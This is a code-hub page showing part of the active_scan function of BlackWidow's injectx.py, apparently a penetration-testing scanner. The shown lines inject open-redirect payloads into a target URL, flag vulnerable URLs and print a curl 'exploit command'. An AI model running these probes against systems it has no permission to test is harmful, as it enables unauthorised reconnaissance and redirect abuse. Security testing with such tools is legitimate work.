MCPcopy
hub / github.com/1N3/BlackWidow / active_scan

Function active_scan

injectx.py:32–700  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

30 print('')
31
32def active_scan():
33
34 new_url = base_url
35
36 # Open Redirect 1 ######################################################################################
37 try:
38 redirect_exploit = urllib.parse.quote("google.com")
39
40 if (verbose == "y"):
41 print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)
42
43 redirect_url = new_url.replace("INJECTX", redirect_exploit)
44 http_request = urllib.request.urlopen(redirect_url)
45 http_response = str(http_request.read())
46 http_length = len(http_response)
47 http_status = http_request.getcode()
48 http_length_diff = str(http_length_base - http_length)
49
50 if (verbose == "y"):
51 print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)
52
53 if "<title>Google</title>" in http_response:
54 print(OKRED + "[+] Open Redirect Found! " + RESET)
55 print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
56 print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto")
57
58 except:
59 pass
60
61 # Open Redirect 2 ######################################################################################
62 try:
63 redirect_exploit = urllib.parse.quote("//google.com")
64
65 if (verbose == "y"):
66 print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)
67
68 redirect_url = new_url.replace("INJECTX", redirect_exploit)
69 http_request = urllib.request.urlopen(redirect_url)
70 http_response = str(http_request.read())
71 http_length = len(http_response)
72 http_status = http_request.getcode()
73 http_length_diff = str(http_length_base - http_length)
74
75 if (verbose == "y"):
76 print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)
77
78 if "<title>Google</title>" in http_response:
79 print(OKRED + "[+] Open Redirect Found! " + RESET)
80 print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
81 print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto")
82
83 except:
84 pass
85
86 # Open Redirect 3 ######################################################################################
87 try:
88 redirect_exploit = urllib.parse.quote("https://google.com")
89

Callers 1

injectx.pyFile · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected